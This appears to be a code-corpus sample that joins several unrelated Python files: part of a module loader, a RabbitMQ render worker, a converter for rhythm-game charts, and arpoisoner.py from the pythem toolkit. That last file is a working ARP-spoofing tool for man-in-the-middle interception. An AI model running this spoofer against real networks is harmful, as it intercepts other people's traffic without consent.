raise KeyError("The key '{}' should contain a '.'".format(key))
mod_name, _ = key.split(".", 1)
with self._lock:
# It is possible that the key is in the dictionary after
# acquiring the lock due to another thread loading it.
if mod_name in self.missing_modules or key in self._dict:
return True
# if the modulename isn't in the whitelist, don't bother
if self.whitelist and mod_name not in self.whitelist:
log.error(
"Failed to load function %s because its module (%s) is "
"not in the whitelist: %s",
key,
mod_name,
self.whitelist,
)
raise KeyError(key)
def _inner_load(mod_name):
for name in self._iter_files(mod_name):
if name in self.loaded_files:
continue
# if we got what we wanted, we are done
if self._load_module(name) and key in self._dict:
return True
return False
# try to load the module
ret = None
reloaded = False
# re-scan up to once, IOErrors or a failed load cause re-scans of the
# filesystem
while True:
try:
ret = _inner_load(mod_name)
if not reloaded and ret is not True:
self._refresh_file_mapping()
reloaded = True
continue
break
except OSError:
if not reloaded:
self._refresh_file_mapping()
reloaded = True
continue
return ret
def _load_all(self):
"""
Load all of them
"""
with self._lock:
for name in self.file_mapping:
if name in self.loaded_files or name in self.missing_modules:
continue
self._load_module(name)
self.loaded = True
def reload_modules(self):
with self._lock:
self.loaded_files = set()
self._load_all()
def _apply_outputter(self, func, mod):
"""
Apply the __outputter__ variable to the functions
"""
if hasattr(mod, "__outputter__"):
outp = mod.__outputter__
if func.__name__ in outp:
func.__outputter__ = outp[func.__name__]
def _process_virtual(self, mod, module_name, virtual_func="__virtual__"):
"""
Given a loaded module and its default name determine its virtual name
This function returns a tuple. The first value will be either True or
False and will indicate if the module should be loaded or not (i.e. if
it threw and exception while processing its __virtual__ function). The
second value is the determined virtual name, which may be the same as
the value provided.
The default name can be calculated as follows::
module_name = mod.__name__.rsplit('.', 1)[-1]
"""
# The __virtual__ function will return either a True or False value.
# If it returns a True value it can also set a module level attribute
# named __virtualname__ with the name that the module should be
# referred to as.
#
# This allows us to have things like the pkg module working on all
# platforms under the name 'pkg'. It also allows for modules like
# augeas_cfg to be referred to as 'augeas', which would otherwise have
# namespace collisions. And finally it allows modules to return False
# if they are not intended to run on the given platform or are missing
# dependencies.
virtual_aliases = getattr(mod, "__virtual_aliases__", tuple())
try:
error_reason = None
if hasattr(mod, "__virtual__") and inspect.isfunction(mod.__virtual__):
try:
start = time.time()
virtual_attr = getattr(mod, virtual_func)
virtual = self.run(virtual_attr)
if isinstance(virtual, tuple):
error_reason = virtual[1]
virtual = virtual[0]
if self.opts.get("virtual_timer", False):
end = time.time() - start
msg = "Virtual function took {} seconds for {}".format(
end, module_name
)
log.warning(msg)
except Exception as exc: # pylint: disable=broad-except
error_reason = (
"Exception raised when processing __virtual__ function"
" for {}. Module will not be loaded: {}".format(
mod.__name__, exc
)
)
log.error(error_reason, exc_info_on_loglevel=logging.DEBUG)
virtual = None
# Get the module's virtual name
virtualname = getattr(mod, "__virtualname__", virtual)
if not virtual:
# if __virtual__() evaluates to False then the module
# wasn't meant for this platform or it's not supposed to
# load for some other reason.
# Some modules might accidentally return None and are
# improperly loaded
if virtual is None:
log.warning(
"%s.__virtual__() is wrongly returning `None`. "
"It should either return `True`, `False` or a new "
"name. If you're the developer of the module "
"'%s', please fix this.",
mod.__name__,
module_name,
)
return (False, module_name, error_reason, virtual_aliases)
# At this point, __virtual__ did not return a
# boolean value, let's check for deprecated usage
# or module renames
if virtual is not True and module_name != virtual:
# The module is renaming itself. Updating the module name
# with the new name
log.trace("Loaded %s as virtual %s", module_name, virtual)
if virtualname != virtual:
# The __virtualname__ attribute does not match what's
# being returned by the __virtual__() function. This
# should be considered an error.
log.error(
"The module '%s' is showing some bad usage. Its "
"__virtualname__ attribute is set to '%s' yet the "
"__virtual__() function is returning '%s'. These "
"values should match!",
mod.__name__,
virtualname,
virtual,
)
module_name = virtualname
# If the __virtual__ function returns True and __virtualname__
# is set then use it
elif virtual is True and virtualname != module_name:
if virtualname is not True:
module_name = virtualname
except KeyError:
# Key errors come out of the virtual function when passing
# in incomplete grains sets, these can be safely ignored
# and logged to debug, still, it includes the traceback to
# help debugging.
log.debug("KeyError when loading %s", module_name, exc_info=True)
except Exception: # pylint: disable=broad-except
# If the module throws an exception during __virtual__()
# then log the information and continue to the next.
log.error(
"Failed to read the virtual function for %s: %s",
self.tag,
module_name,
exc_info=True,
)
return (False, module_name, error_reason, virtual_aliases)
return (True, module_name, None, virtual_aliases)
def run(self, _func_or_method, *args, **kwargs):
"""
Run the `_func_or_method` in this loader's context
"""
self._last_context = contextvars.copy_context()
return self._last_context.run(self._run_as, _func_or_method, *args, **kwargs)
def _run_as(self, _func_or_method, *args, **kwargs):
"""
Handle setting up the context properly and call the method
"""
self.parent_loader = None
try:
current_loader = salt.loader.context.loader_ctxvar.get()
except LookupError:
current_loader = None
if current_loader is not self:
self.parent_loader = current_loader
token = salt.loader.context.loader_ctxvar.set(self)
try:
return _func_or_method(*args, **kwargs)
finally:
self.parent_loader = None
salt.loader.context.loader_ctxvar.reset(token)
def run_in_thread(self, _func_or_method, *args, **kwargs):
"""
Run the function in a new thread with the context of this loader
"""
argslist = [self, _func_or_method]
argslist.extend(args)
thread = threading.Thread(target=self.target, args=argslist, kwargs=kwargs)
thread.start()
return thread
@staticmethod
def target(loader, _func_or_method, *args, **kwargs):
loader.run(_func_or_method, *args, **kwargs)
def global_injector_decorator(inject_globals):
"""
Decorator used by the LazyLoader to inject globals into a function at
execute time.
globals
Dictionary with global variables to inject
"""
def inner_decorator(f):
@functools.wraps(f)
def wrapper(*args, **kwargs):
with salt.utils.context.func_globals_inject(f, **inject_globals):
return f(*args, **kwargs)
return wrapper
return inner_decorator
|
worker.py
|
#!/usr/bin/env python3
# Copyright 2004-present Facebook. All Rights Reserved.
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
"""Consumption side of render message queue.
Provides the interface for performing computations based on messages received
from the queue. Running a worker node only has semantic meaning in the context of
subscribing to a master running a queue, but once it establishes connection, it will
continue to poll for messages until explicitly terminated or the connection is closed.
Example:
To run a single worker node subscribed to 192.168.1.100:
$ python worker.py \
--master=192.168.1.100
Attributes:
FLAGS (absl.flags._flagvalues.FlagValues): Globally defined flags for worker.py.
"""
import functools
import json
import os
import shutil
import sys
import threading
from copy import copy
import pika
from absl import app, flags
dir_scripts = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
dir_root = os.path.dirname(dir_scripts)
sys.path.append(dir_root)
sys.path.append(os.path.join(dir_scripts, "util"))
import config
from network import (
copy_image_level,
download,
download_image_type,
download_image_types,
download_rig,
get_cameras,
get_frame_fns,
get_frame_name,
get_frame_range,
local_image_type_path,
local_rig_path,
remote_image_type_path,
upload,
upload_image_type,
)
from resize import resize_frames
from scripts.winrender.network import Address
from scripts.util.system_util import run_command
from setup import bin_to_flags
FLAGS = flags.FLAGS
def _run_bin(msg):
"""Runs the binary associated with the message. The execution assumes the worker is
running in a configured Docker container.
Args:
msg (dict[str, str]): Message received from RabbitMQ publisher.
"""
msg_cp = copy(msg)
# The binary flag convention includes the "last" frame
msg_cp["last"] = get_frame_name(int(msg["last"]))
app_name = msg_cp["app"].split(":")[0]
relevant_flags = [flag["name"] for flag in bin_to_flags[app_name]]
cmd_flags = " ".join(
[
f"--{flag}={msg_cp[flag]}"
for flag in relevant_flags
if flag in msg_cp and msg_cp[flag] != ""
]
)
# Order is determined to prevent substrings from being accidentally replaced
input_root = msg_cp["input_root"].rstrip("/")
output_root = msg_cp["output_root"].rstrip("/")
root_order = (
[output_root, input_root]
if input_root in output_root
else [input_root, output_root]
)
root_to_docker = {
input_root: config.DOCKER_INPUT_ROOT,
output_root: config.DOCKER_OUTPUT_ROOT,
}
for root in root_order:
if not os.path.exists(root):
cmd_flags = cmd_flags.replace(root, root_to_docker[root])
bin_path = os.path.join(config.DOCKER_BUILD_ROOT, "bin", app_name + ".exe")
cmd = f"set GLOG_alsologtostderr=1 && set GLOG_stderrthreshold=0 && {bin_path} {cmd_flags}"
run_command(cmd)
def _clean_worker(ran_download, ran_upload):
"""Deletes any files that were downloaded or uploaded.
Args:
ran_download (bool): Whether or not a download was performed.
ran_upload (bool): Whether or not an upload was performed.
"""
if ran_download and os.path.exists(config.DOCKER_INPUT_ROOT):
shutil.rmtree(config.DOCKER_INPUT_ROOT)
if ran_upload and os.path.exists(config.DOCKER_INPUT_ROOT):
shutil.rmtree(config.DOCKER_OUTPUT_ROOT)
def generate_foreground_masks_callback(msg):
"""Runs foreground mask generation according to parameters read from the message.
Args:
msg (dict[str, str]): Message received from RabbitMQ publisher.
"""
print("Running foreground mask generation...")
image_types_to_level = [("color", msg["level"])]
ran_download = download_rig(msg)
ran_download |= download_image_types(msg, image_types_to_level)
ran_download |= download_image_type(
msg, "background_color", [msg["background_frame"]], msg["level"]
)
msg_cp = copy(msg)
msg_cp["color"] = local_image_type_path(msg, "color", msg["level"])
msg_cp["background_color"] = local_image_type_path(
msg, "background_color", msg["level"]
)
msg_cp["foreground_masks"] = local_image_type_path(
msg, "foreground_masks", msg["dst_level"]
)
_run_bin(msg_cp)
ran_upload = upload_image_type(msg, "foreground_masks", level=msg["dst_level"])
_clean_worker(ran_download, ran_upload)
def resize_images_callback(msg):
"""Runs image resizing according to parameters read from the message.
Args:
msg (dict[str, str]): Message received from RabbitMQ publisher.
"""
print("Running image resizing...")
image_types_to_level = [(msg["image_type"], None)]
ran_download = download_rig(msg)
ran_download |= download_image_types(msg, image_types_to_level)
with open(local_rig_path(msg), "r") as f:
rig = json.load(f)
local_src_dir = local_image_type_path(msg, msg["image_type"])
local_dst_dir = local_image_type_path(
msg, config.type_to_levels_type[msg["image_type"]]
)
resize_frames(
local_src_dir, local_dst_dir, rig, msg["first"], msg["last"], msg["threshold"]
)
# Clean up workspace to prevent using too much disk space on workers
for level in msg["dst_level"]:
ran_upload = upload_image_type(msg, msg["image_type"], level=level)
_clean_worker(ran_download, ran_upload)
def depth_estimation_callback(msg):
"""Runs depth estimation according to parameters read from the message.
Args:
msg (dict[str, str]): Message received from RabbitMQ publisher.
"""
print("Running depth estimation...")
ran_download = False
msg_cp = copy(msg)
if msg["image_type"] == "disparity":
image_types_to_level = [("color", msg["level_start"])]
if msg["use_foreground_masks"]:
ran_download |= download_image_type(
msg, "background_disp", [msg["background_frame"]], msg["level_start"]
)
image_types_to_level.append(("foreground_masks", msg["level_start"]))
if msg["level_start"] < msg["num_levels"] - 1:
image_types_to_level.append(("disparity", msg["level_start"] + 1))
if msg["use_foreground_masks"]:
image_types_to_level.append(
("foreground_masks", msg["level_start"] + 1)
)
else:
image_types_to_level = [("background_color", msg["level_start"])]
if msg["level_start"] < msg["num_levels"] - 1:
image_types_to_level.append(("background_disp", msg["level_start"] + 1))
msg_cp["color"] = local_image_type_path(msg, "background_color_levels")
msg_cp["output_root"] = os.path.join(msg["input_root"], "background")
ran_download |= download_rig(msg)
ran_download |= download_image_types(msg, image_types_to_level)
_run_bin(msg_cp)
ran_upload = upload_image_type(msg, msg["image_type"], level=msg["level_end"])
_clean_worker(ran_download, ran_upload)
def temporal_filter_callback(msg):
"""Runs temporal filtering according to parameters read from the message.
Args:
msg (dict[str, str]): Message received from RabbitMQ publisher.
"""
print("Running temporal filtering...")
# If such frames do not exist, S3 simply does not download them
msg_cp = copy(msg)
frames = get_frame_range(msg["filter_first"], msg["filter_last"])
image_types_to_level = [("color", msg["level"]), ("disparity", msg["level"])]
if msg["use_foreground_masks"]:
image_types_to_level.append(("foreground_masks", msg["level"]))
ran_download = download_rig(msg)
ran_download |= download_image_types(msg, image_types_to_level, frames)
msg_cp["disparity"] = "" # disparity_level is automatically populated by app
_run_bin(msg_cp)
processed_frames = get_frame_range(msg["first"], msg["last"])
ran_upload = upload_image_type(
msg, "disparity_time_filtered", processed_frames, level=msg["level"]
)
_clean_worker(ran_download, ran_upload)
def transfer_callback(msg):
"""Runs transfer according to parameters read from the message.
Args:
msg (dict[str, str]): Message received from RabbitMQ publisher.
"""
print("Running rearranging...")
rig_cameras = get_cameras(msg, "cameras")
frames = get_frame_range(msg["first"], msg["last"])
copy_image_level(
msg,
msg["src_image_type"],
msg["dst_image_type"],
rig_cameras,
frames,
msg["src_level"],
msg["dst_level"],
)
def _run_upsample(msg, run_upload=True):
"""Runs disparity upsampling according to parameters read from the message.
Args:
msg (dict[str, str]): Message received from RabbitMQ publisher.
run_upload (bool, optional): Whether or not an upload was performed.
Returns:
tuple(bool, bool): Respectively whether or not a download and upload were performed.
"""
image_types_to_level = [(msg["image_type"], msg["level"])]
msg_cp = copy(msg)
if msg["image_type"] == "disparity":
color_image_type = "color"
image_types_to_level += [
("foreground_masks", msg["level"]),
("foreground_masks", msg["dst_level"]),
]
msg_cp["foreground_masks_in"] = local_image_type_path(
msg, "foreground_masks", msg["level"]
)
msg_cp["foreground_masks_out"] = local_image_type_path(
msg, "foreground_masks", msg["dst_level"]
)
msg_cp["background_disp"] = local_image_type_path(
msg, "background_disp", msg["dst_level"]
)
download_image_type(
msg, "background_disp", [msg["background_frame"]], msg["dst_level"]
)
msg_cp["background_disp"] = local_image_type_path(
msg, "background_disp", msg["dst_level"]
)
elif msg["image_type"] == "background_disp":
color_image_type = "background_color"
msg_cp["foreground_masks_in"] = "" # Background upsampling doesn't use masks
msg_cp["foreground_masks_out"] = ""
image_types_to_level.append((color_image_type, msg["dst_level"]))
ran_download = download_image_types(msg, image_types_to_level)
ran_download |= download_rig(msg)
msg_cp["disparity"] = local_image_type_path(msg, msg["image_type"], msg["level"])
msg_cp["output"] = local_image_type_path(
msg, config.type_to_upsample_type[msg["image_type"]]
)
msg_cp["color"] = local_image_type_path(msg, color_image_type, msg["dst_level"])
_run_bin(msg_cp)
if run_upload:
ran_upload = upload_image_type(
msg, config.type_to_upsample_type[msg["image_type"]]
)
return ran_download, ran_upload
def upsample_disparity_callback(msg):
"""Runs disparity upsampling according to parameters read from the message.
Args:
msg (dict[str, str]): Message received from RabbitMQ publisher.
"""
print("Running disparity upsampling...")
ran_download, ran_upload = _run_upsample(msg)
_clean_worker(ran_download, ran_upload)
def upsample_layer_disparity_callback(msg):
"""Runs disparity upsampling and layering according to parameters read from the message.
Args:
msg (dict[str, str]): Message received from RabbitMQ publisher.
"""
print("Running disparity upsampling and layering...")
msg_cp = copy(msg)
msg_cp["app"] = "UpsampleDisparity"
ran_download, _ = _run_upsample(msg, run_upload=False)
ran_download |= download_image_type(
msg, config.type_to_upsample_type["background_disp"], [msg["background_frame"]]
)
msg_cp["app"] = "LayerDisparities"
msg_cp["background_disp"] = local_image_type_path(
msg, config.type_to_upsample_type["background_disp"]
)
msg_cp["foreground_disp"] = local_image_type_path(
msg, config.type_to_upsample_type["disparity"]
)
msg_cp["output"] = config.DOCKER_OUTPUT_ROOT
_run_bin(msg_cp)
ran_upload = upload_image_type(msg, "disparity")
_clean_worker(ran_download, ran_upload)
def convert_to_binary_callback(msg):
"""Runs binary conversion according to parameters read from the message.
Args:
msg (dict[str, str]): Message received from RabbitMQ publisher.
"""
print("Converting to binary...")
msg_cp = copy(msg)
ran_download = download_rig(msg)
rig_json = os.path.basename(msg["rig"])
ext_index = rig_json.index(".")
fused_json = f"{rig_json[:ext_index]}_fused{rig_json[ext_index:]}"
if msg["run_conversion"]:
image_types_to_level = [
(msg["color_type"], None),
(msg["disparity_type"], msg["level"]),
]
msg_cp["disparity"] = local_image_type_path(
msg, msg["disparity_type"], msg["level"]
)
msg_cp["color"] = local_image_type_path(msg, msg["color_type"])
msg_cp["fused"] = "" # fusion is done independently from conversion
ran_download |= download_image_types(msg, image_types_to_level)
# If we only have color levels uploaded to S3, we fall back to level_0
if len(os.listdir(msg_cp["color"])) == 0:
ran_download = download_image_types(msg, [(msg["color_type"], 0)])
msg_cp["color"] = local_image_type_path(msg, msg["color_type"], 0)
else:
image_types_to_level = [("bin", None)]
local_fused_dir = local_image_type_path(msg, "fused")
# Paths are explicitly emptied to avoid path verifications
msg_cp["color"] = ""
msg_cp["disparity"] = ""
msg_cp["foreground_masks"] = ""
msg_cp["fused"] = local_fused_dir
ran_download |= download_image_types(msg, image_types_to_level)
ran_download |= download(
src=os.path.join(remote_image_type_path(msg, "bin"), fused_json),
dst=os.path.join(local_image_type_path(msg, "bin"), fused_json),
)
msg_cp["bin"] = local_image_type_path(msg, "bin")
os.makedirs(msg["bin"], exist_ok=True)
_run_bin(msg_cp)
if msg["run_conversion"]:
ran_upload = upload_image_type(msg, "bin")
ran_upload |= upload(
src=os.path.join(local_image_type_path(msg, "bin"), fused_json),
dst=os.path.join(remote_image_type_path(msg, "bin"), fused_json),
)
else:
# We use a raw upload since upload_image_type only handles frames but we want to
# also upload the fused json here
ran_upload = upload(
src=local_image_type_path(msg, "fused"),
dst=remote_image_type_path(msg, "fused"),
filters=["*"],
)
_clean_worker(ran_download, ran_upload)
def simple_mesh_renderer_callback(msg):
print("Generating exports...")
msg_cp = copy(msg)
frames = get_frame_range(msg_cp["first"], msg_cp["last"])
ran_download = download_rig(msg)
ran_download = download_image_type(msg, msg_cp["color_type"], frames)
ran_download |= download_image_type(msg, msg_cp["disparity_type"], frames)
msg_cp["color"] = local_image_type_path(msg, msg_cp["color_type"])
msg_cp["disparity"] = local_image_type_path(msg, msg_cp["disparity_type"])
msg_cp["output"] = local_image_type_path(msg, msg_cp["dst_image_type"])
msg_cp["position"] = '"0.0 0.0 0.0"'
msg_cp["forward"] = '"-1.0 0.0 0.0"'
msg_cp["up"] = '"0.0 0.0 1.0"'
_run_bin(msg_cp)
ran_upload = upload_image_type(msg, msg_cp["dst_image_type"], frames)
_clean_worker(ran_download, ran_upload)
def success(channel, delivery_tag):
if channel.is_open:
channel.basic_ack(delivery_tag)
channel.queue_declare(config.RESPONSE_QUEUE_NAME)
channel.basic_publish(
exchange="", routing_key=config.RESPONSE_QUEUE_NAME, body="Completed!"
)
else:
pass
def failure(channel, delivery_tag, msg):
if channel.is_open:
channel.basic_reject(delivery_tag)
channel.queue_declare(config.QUEUE_NAME)
channel.basic_publish(
exchange="",
routing_key=config.QUEUE_NAME,
body=json.dumps(msg),
properties=pika.BasicProperties(delivery_mode=2), # make message persistent
)
else:
pass
def handle_message(connection, channel, delivery_tag, body):
msg = json.loads(body.decode("utf-8"))
try:
print(f"Received {msg}")
app_name_to_callback = {
"GenerateForegroundMasks": generate_foreground_masks_callback,
"DerpCLI": depth_estimation_callback,
"TemporalBilateralFilter": temporal_filter_callback,
"Transfer": transfer_callback,
"UpsampleDisparity": upsample_disparity_callback,
"UpsampleLayer": upsample_layer_disparity_callback,
"ConvertToBinary": convert_to_binary_callback,
"SimpleMeshRenderer": simple_mesh_renderer_callback,
"Resize": resize_images_callback,
}
for app_name in app_name_to_callback:
if msg["app"].startswith(app_name):
app_name_to_callback[app_name](msg)
break
# Sends response of job completion
success_callback = functools.partial(success, channel, delivery_tag)
connection.add_callback_threadsafe(success_callback)
except Exception:
print(f"Exception triggered in {app_name}")
failure_callback = functools.partial(failure, channel, delivery_tag, msg)
connection.add_callback_threadsafe(failure_callback)
def callback(ch, method, properties, body, connection):
"""Dispatches to different callbacks based on the contents of the message.
Args:
Only the body argument is necessary. The others are imposed by Pika.
ch (pika.Channel): N/a
method (pika.spec.Basic): N/a
properties (pika.spec.BasicProperties): N/a
body (bytes): utf-8 encoded message published to the message queue.
"""
handle = threading.Thread(
target=handle_message, args=(connection, ch, method.delivery_tag, body)
)
handle.start()
def main_loop(argv):
"""Sets up the callback loop for the worker.
Args:
argv (list[str]): List of arguments (used interally by abseil).
"""
while True:
try:
connection = pika.BlockingConnection(
pika.ConnectionParameters(FLAGS.master)
)
on_message_callback = functools.partial(callback, connection=(connection))
channel = connection.channel()
channel.queue_declare(queue=config.QUEUE_NAME)
channel.basic_qos(prefetch_count=1)
channel.basic_consume(
queue=config.QUEUE_NAME,
auto_ack=False,
on_message_callback=on_message_callback,
)
channel.start_consuming()
# Don't recover if connection was closed by broker
except pika.exceptions.ConnectionClosedByBroker:
break
# Don't recover on channel errors
except pika.exceptions.AMQPChannelError:
break
# Recover on all other connection errors
except pika.exceptions.AMQPConnectionError:
continue
if __name__ == "__main__":
# Abseil entry point app.run() expects all flags to be already defined
flags.DEFINE_string("master", None, "master IP")
# Required FLAGS.
flags.mark_flag_as_required("master")
app.run(main_loop)
|
arpoisoner.py
|
#!/usr/bin/env python2.7
# coding=UTF-8
# Copyright (c) 2016-2018 Angelo Moura
#
# This file is part of the program pythem
#
# pythem is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
from scapy.all import *
from netaddr import IPNetwork, IPRange, IPAddress, AddrFormatError
import threading
from time import sleep
from utils import *
class ARPspoof(object):
name = "ARP poisoner spoofer"
desc = "Use arp spoofing in order to realize a man-in-the-middle attack"
version = "0.5"
def __init__(self, gateway, targets, interface, myip, mymac):
try:
self.gateway = str(IPAddress(gateway))
except AddrFormatError as e:
print "[-] Select a valid IP address as gateway"
iptables()
set_ip_forwarding(1)
self.gateway_mac = None
self.range = False
self.targets = self.get_range(targets)
self.send = True
self.interval = 3
self.interface = interface
self.myip = myip
self.mymac = mymac
self.socket = conf.L3socket(iface=self.interface)
self.socket2 = conf.L2socket(iface=self.interface)
def start(self):
t = threading.Thread(name='ARPspoof', target=self.spoof)
t.setDaemon(True)
t.start()
def get_range(self, targets):
if targets is None:
print "[!] IP address/range was not specified, will intercept only gateway requests and not replies."
return None
try:
target_list = []
for target in targets.split(','):
if '/' in target:
self.range = True
target_list.extend(list(IPNetwork(target)))
elif '-' in target:
start_addr = IPAddress(target.split('-')[0])
try:
end_addr = IPAddress(target.split('-')[1])
ip_range = IPRange(start_addr, end_addr)
except AddrFormatError:
end_addr = list(start_addr.words)
end_addr[-1] = target.split('-')[1]
end_addr = IPAddress('.'.join(map(str, end_addr)))
ip_range = IPRange(start_addr, end_addr)
target_list.extend(list(ip_range))
else:
target_list.append(IPAddress(target))
return target_list
except AddrFormatError:
sys.exit("[!] Select a valid IP address/range as target")
def resolve_mac(self, targetip):
try:
conf.verb = 0
ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(op="who-has", pdst=targetip), timeout=2)
for snd, rcv in ans:
return str(rcv[Ether].src)
except socket.gaierror:
print "[!] Select a valid IP Address as target/gateway, exiting ..."
exit(0)
def spoof(self):
sleep(2)
while self.send:
if self.targets is None:
self.socket2.send(
Ether(src=self.mymac, dst="ff:ff:ff:ff:ff:ff") / ARP(hwsrc=self.mymac, psrc=self.gateway,
op="is-at"))
elif self.targets:
try:
self.gateway_mac = self.resolve_mac(self.gateway)
while not self.gateway_mac:
print "[-] Error: Couldn't retrieve MAC address from gateway, retrying..."
self.gateway_mac = self.resolve_mac(self.gateway)
except KeyboardInterrupt:
print "[!] Aborted."
set_ip_forwarding(0)
self.socket.close()
self.socket2.close()
return
for target in self.targets:
targetip = str(target)
if (targetip != self.myip):
targetmac = self.resolve_mac(targetip)
if targetmac is not None:
try:
self.socket.send(ARP(pdst=targetip, psrc=self.gateway, hwdst=targetmac, op="is-at"))
self.socket.send(
ARP(pdst=self.gateway, psrc=targetip, hwdst=self.gateway_mac, op="is-at"))
except Exception as e:
if "Interrupted system call" not in e:
pass
sleep(self.interval)
def stop(self):
try:
self.gateway_mac = self.resolve_mac(self.gateway)
while not self.gateway_mac:
print "[-] Error: Couldn't retrieve MAC address from gateway, retrying..."
self.gateway_mac = self.resolve_mac(self.gateway)
except KeyboardInterrupt:
print "[!] Aborted."
set_ip_forwarding(0)
self.socket.close()
self.socket2.close()
return
self.send = False
sleep(1)
count = 4
if self.targets is None or self.range:
print "[*] Restoring sub-net connection with {} packets".format(count)
pkt = Ether(src=self.gateway_mac, dst="ff:ff:ff:ff:ff:ff") / ARP(hwsrc=self.gateway_mac, psrc=self.gateway,
op="is-at")
for i in range(0, count):
self.socket2.send(pkt)
set_ip_forwarding(0)
self.socket.close()
self.socket2.close()
return
elif self.targets:
for target in self.targets:
target_ip = str(target)
target_mac = self.resolve_mac(target_ip)
if target_mac is not None:
print "[+] Restoring connection {} <--> {} with {} packets for host".format(target_ip, self.gateway,
count)
try:
for i in range(0, count):
self.socket2.send(
Ether(src=target_mac, dst='ff:ff:ff:ff:ff:ff') / ARP(op="is-at", pdst=self.gateway,
psrc=targetip,
hwdst="ff:ff:ff:ff:ff:ff",
hwsrc=target_mac))
self.socket2.send(
Ether(src=self.gateway_mac, dst='ff:ff:ff:ff:ff:ff') / ARP(op="is-at", pdst=targetip,
psrc=self.gateway,
hwdst="ff:ff:ff:ff:ff:ff",
hwsrc=self.gateway_mac))
except Exception as e:
if "Interrupted system call" not in e:
pass
set_ip_forwarding(0)
self.socket.close()
self.socket2.close()
return
|
converter.py
|
#!/usr/bin/env python3.7
import argparse
from collections import defaultdict
from dataclasses import dataclass
from enum import Enum, auto
from functools import total_ordering
from glob import glob
import math
import os
from os.path import splitext as splitx
import re
import shutil
import sys
import threading
import time
import traceback
from xml.etree import ElementTree
import ksh_effects
# Ticks per a beat of /4 time
VOX_TICKS_PER_BEAT = 48
KSH_TICKS_PER_BEAT = 16
SLAM_TICKS = 4
FX_CHIP_SOUND_COUNT = 14
KSH_DEFAULT_FILTER_GAIN = 50
KSH_DEFAULT_SLAM_VOL = 40
EFFECT_FALLBACK_NAME = 'fallback'
AUDIO_EXTENSION = '.ogg'
FX_CHIP_SOUND_EXTENSION = '.wav'
FX_CHIP_SOUND_VOL_PERCENT = 27
MAX_MEASURES = 999
# lord forgive me
HEPBURN_ROMANIZATION = """
あ ア a \tい イ i \tう ウ u \tえ エ e \tお オ o
か カ ka \tき キ ki \tく ク ku \tけ ケ ke \tこ コ ko \tきゃ キャ kya \tきゅ キュ kyu \tきょ キョ kyo
さ サ sa \tし シ shi \tす ス su \tせ セ se \tそ ソ so \tしゃ シャ sha \tしゅ シュ shu \tしょ ショ sho
た タ ta \tち チ chi \tつ ツ tsu \tて テ te \tと ト to \tちゃ チャ cha \tちゅ チュ chu \tちょ チョ cho
な ナ na \tに ニ ni \tぬ ヌ nu \tね ネ ne \tの ノ no \tにゃ ニャ nya \tにゅ ニュ nyu \tにょ ニョ nyo
は ハ ha \tひ ヒ hi \tふ フ fu \tへ ヘ he \tほ ホ ho \tひゃ ヒャ hya \tひゅ ヒュ hyu \tひょ ヒョ hyo
ま マ ma \tみ ミ mi \tむ ム mu \tめ メ me \tも モ mo \tみゃ ミャ mya \tみゅ ミュ myu \tみょ ミョ myo
や ヤ ya \tゆ ユ yu \tよ ヨ yo \t
ら ラ ra \tり リ ri \tる ル ru \tれ レ re \tろ ロ ro \tりゃ リャ rya \tりゅ リュ ryu \tりょ リョ ryo
わ ワ wa \tゐ ヰ i \tゑ ヱ e \tを ヲ o \t
\tん ン n \t
が ガ ga \tぎ ギ gi \tぐ グ gu \tげ ゲ ge \tご ゴ go \tぎゃ ギャ gya \tぎゅ ギュ gyu \tぎょ ギョ gyo
ざ ザ za \tじ ジ ji \tず ズ zu \tぜ ゼ ze \tぞ ゾ zo \tじゃ ジャ ja \tじゅ ジュ ju \tじょ ジョ jo
だ ダ da \tぢ ヂ ji \tづ ヅ zu \tで デ de \tど ド do \tぢゃ ヂャ ja \tぢゅ ヂュ ju \tぢょ ヂョ jo
ば バ ba \tび ビ bi \tぶ ブ bu \tべ ベ be \tぼ ボ bo \tびゃ ビャ bya \tびゅ ビュ byu \tびょ ビョ byo
ぱ パ pa \tぴ ピ pi \tぷ プ pu \tぺ ペ pe \tぽ ポ po \tぴゃ ピャ pya \tぴゅ ピュ pyu \tぴょ ピョ pyo
"""
def to_path(text):
hepburn_rules = HEPBURN_ROMANIZATION.split('\n')
rules = [x.strip() for y in hepburn_rules for x in y.split('\t') if len(x.strip()) > 0]
for rule in rules:
pieces = rule.split(' ')
if len(pieces) != 3:
continue
hiragana, katakana, rōmaji = pieces
text = text.replace(hiragana, rōmaji).replace(katakana, rōmaji)
return re.sub(r'[^\w]+', '_', text, flags=re.UNICODE)
class Debug:
class State(Enum):
INPUT = auto()
OUTPUT = auto()
class Level(Enum):
ABNORMALITY = 'abnormal'
WARNING = 'warning'
ERROR = 'error'
def __init__(self, exceptions_file):
self.state = None
self.input_filename = None
self.output_filename = None
self.current_line_num = 0
self.exceptions_count = {level: 0 for level in Debug.Level}
self.exceptions_file = open(exceptions_file, 'w+')
def reset(self):
for level in self.Level:
self.exceptions_count[level] = 0
def close(self):
self.exceptions_file.close()
def current_filename(self):
return self.input_filename if self.state == self.State.INPUT else self.output_filename
def record(self, level, tag, message):
self.exceptions_count[level] += 1
print(f'{self.current_filename()}:{self.current_line_num}\n{level.value} / {tag}: {message}\n',
file=self.exceptions_file)
def has_issues(self):
for level in self.Level:
if self.exceptions_count[level] > 0:
return True
return False
def record_last_exception(self, level=Level.WARNING, tag='python_exception', trace=False):
self.record(level, tag, str(sys.exc_info()[1]) + '\n\tTraceback:\n' + '\n'.join(traceback.format_tb(sys.exc_info()[2])))
def truncate(x, digits) -> float:
stepper = 10.0 ** digits
return math.trunc(stepper * x) / stepper
class KshParseError(Exception):
pass
class TimeSignature:
def __init__(self, top, bottom):
self.top: int = top
self.bottom: int = bottom
def ticks_per_beat(self):
return int(VOX_TICKS_PER_BEAT * (4 / self.bottom))
class Timing:
# TODO Take timesig as a param
def __init__(self, measure, beat, offset):
self.measure: int = measure
self.beat: int = beat
self.offset: int = offset
def to_time_str(self):
""" Create the format string that appears in the first column of vox tracks. """
